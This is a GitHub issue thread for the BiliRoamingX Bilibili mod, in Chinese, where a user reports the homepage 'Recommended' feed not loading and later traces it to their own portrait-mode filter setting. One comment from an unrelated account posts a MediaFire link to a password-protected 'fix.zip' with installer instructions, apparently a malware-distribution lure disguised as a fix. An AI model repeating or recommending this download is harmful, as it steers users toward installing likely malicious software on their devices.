### ISSUE TITLE
[BUG] 首页无法加载

### ISSUE THREAD

**Issue by YuHan0v0** [BiliRoamingX/BiliRoamingX#434]
### 系统版本

ColorOS14

### Android 版本

14

### 哔哩哔哩版本

粉版（普通版）

### 哔哩哔哩版本号

8.10.0

### 问题描述

首页的“推荐”无法加载
“热门”、”动画“、”全会“加载正常，”动态“、”我的“加载正常

### 复现步骤

1. 打开哔哩哔哩
2. 首页”推荐“无法加载
3. 下拉刷新后依旧无法加载

### 日志

[BiliRoamingX_Pink_backup_20240827223832.zip](https://github.com/user-attachments/files/16777788/BiliRoamingX_Pink_backup_20240827223832.zip)

### 截图或录屏

![Screenshot_2024-08-28-07-12-55-66_149003a2d400f6adb210d7e357a3a646](https://github.com/user-attachments/assets/6ea87ee0-f618-4418-8550-ae92de887471)

**Comment by YuHan0v0** [comment]
[log_哔哩哔哩.zip](https://github.com/user-attachments/files/16777837/log_.zip)

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zjns** [comment]
无法复现，重装并检查首页推荐相关漫游X设置试试

**Comment by YuHan0v0** [comment]
> 无法复现，重装并检查首页推荐相关漫游X设置试试
重装哔哩哔哩后发现是首页推荐设置的问题，之前设置成竖屏模式导致首页视频全部被过滤了😅
![Screenshot_2024-08-28-18-16-01-28_149003a2d400f6adb210d7e357a3a646](https://github.com/user-attachments/assets/696b8048-4913-4328-bcb5-c0665ff75d3f)
![Screenshot_2024-08-28-18-13-55-86_149003a2d400f6adb210d7e357a3a646](https://github.com/user-attachments/assets/5920b96c-26f8-43b6-b6bc-469c08bda469)
